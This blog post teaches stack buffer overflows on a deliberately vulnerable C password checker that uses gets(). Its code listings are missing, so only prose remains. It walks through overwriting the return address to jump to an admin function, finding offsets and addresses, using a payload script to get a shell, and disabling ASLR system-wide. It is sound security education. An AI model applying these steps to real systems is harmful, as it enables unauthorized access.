Understanding Buffer Overrun Exploits
25 Oct 2024Introduction
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.
In this post, we’ll take a closer look at buffer overrun exploits, how they work, and explore some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the server.
do_super_admin_things
is our example. It might be an admin shell, or something else. The point is this program is
trying to control access to that function by making sure you have the password, first!
The validate_password
function is responsible for getting that password in from the outside world. It’s prompts, and
then reads from stdin
. Note the use of gets()
.
Warning About gets
The usage of gets()
here is highly frowned upon because of how insecure it is. Below are notes from the man page for
it:
BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. It’s such a horrible function security-wise that it has been deprecated from
the C99 standard as per §7.26.13
:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s don’t use gets()
.
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
Checking the Password
The check_password
function reads a file from disk that contains the super-secret password, then compares the attempt
to the correct password.
Crashes
Initially, if you provide any normal input, the program behaves as expected:
But if you push the input a bit further, exceeding the bounds of the password_attempt
buffer, you can trigger a crash:
The program crashes due to a segmentation fault. Checking dmesg
gives us more information:
Notice the 41414141
pattern. This is significant because it shows that the capital A’s from our input (0x41
in
hexadecimal) are making their way into the instruction pointer (ip
). The input we provided has overflowed into crucial
parts of the stack, including the instruction pointer.
You can verify that 0x41
represents ‘A’ by running the following command:
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt
buffer. This buffer is a local variable
in the validate_password
function, and in the stack, local variables are stored just below the return address. When
password_attempt
overflows, the excess data overwrites the return address on the stack. Once overwritten, we control
what address the CPU will jump to after validate_password
finishes.
Maybe, we could find the address of the do_super_admin_things
function and simply jump directly to it. In order to do
this, we need to find the address. Only the name of the function is available to us in the source code, and the address
of the function is determined at compile time; so we need to lean on some other tools in order to gather this intel.
By using objdump
we can take a look inside of the compiled executable and get this information.
This will decompile the vuln1
program and give us the location of each of the functions. We search for the function
that we want (do_super_admin_things
):
We find that it’s at address 00001316
. We need to take note of this value as we’ll need it shortly.
Now we need to find the spot among that big group of A’s that we’re sending into the input, exactly where the right spot
is, where we can inject our address onto the stack. We’ve already got some inside knowledge about our buffer. It’s 64
bytes in length.
We really need a magic mark in the input so we can determine where to send our address in. We can do that with some well known payload data. We re-run the program with our 64 A’s but we also add a pattern of characters afterwards:
This seg faults again, but you can see the BBBBCCCCDDDDEEEEFFFF
at the end of the 64 A’s. Looking at the log in
dmesg
now:
The 45454545
tells us which part of the input is being sent in as the return address. \x45
is the E
’s
That means that our instruction pointer will start at the E
’s.
Prepare the Payload
To make life easier for us, we’ll write a python script that will generate this payload for us. Note that this is using our function address from before.
We can now inject this into the execution of our binary and achieve a shell:
We use (python3 payload.py; cat)
here because of the shell’s handling of file descriptors. Without doing this and
simply piping the output, our shell would kill the file descriptors off.
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of 1do_super_admin_things` in GDB, we might see something like:
This differs from the objdump
address 0x1326
, as it’s been shifted by the base address of the executable
(e.g., 0x56555000
in this case). This discrepancy is due to ASLR.
Temporarily Disabling ASLR for Demonstration
To ensure the addresses in objdump
match those at runtime, we can temporarily disable ASLR. This makes the program
load at consistent addresses, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, run:
This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2
:
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and
demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump
, we could inspect static
addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily allowed us to match objdump
addresses to those at runtime, making the exploit demonstration
clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a
program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets()
and implementing stack
protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices
create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.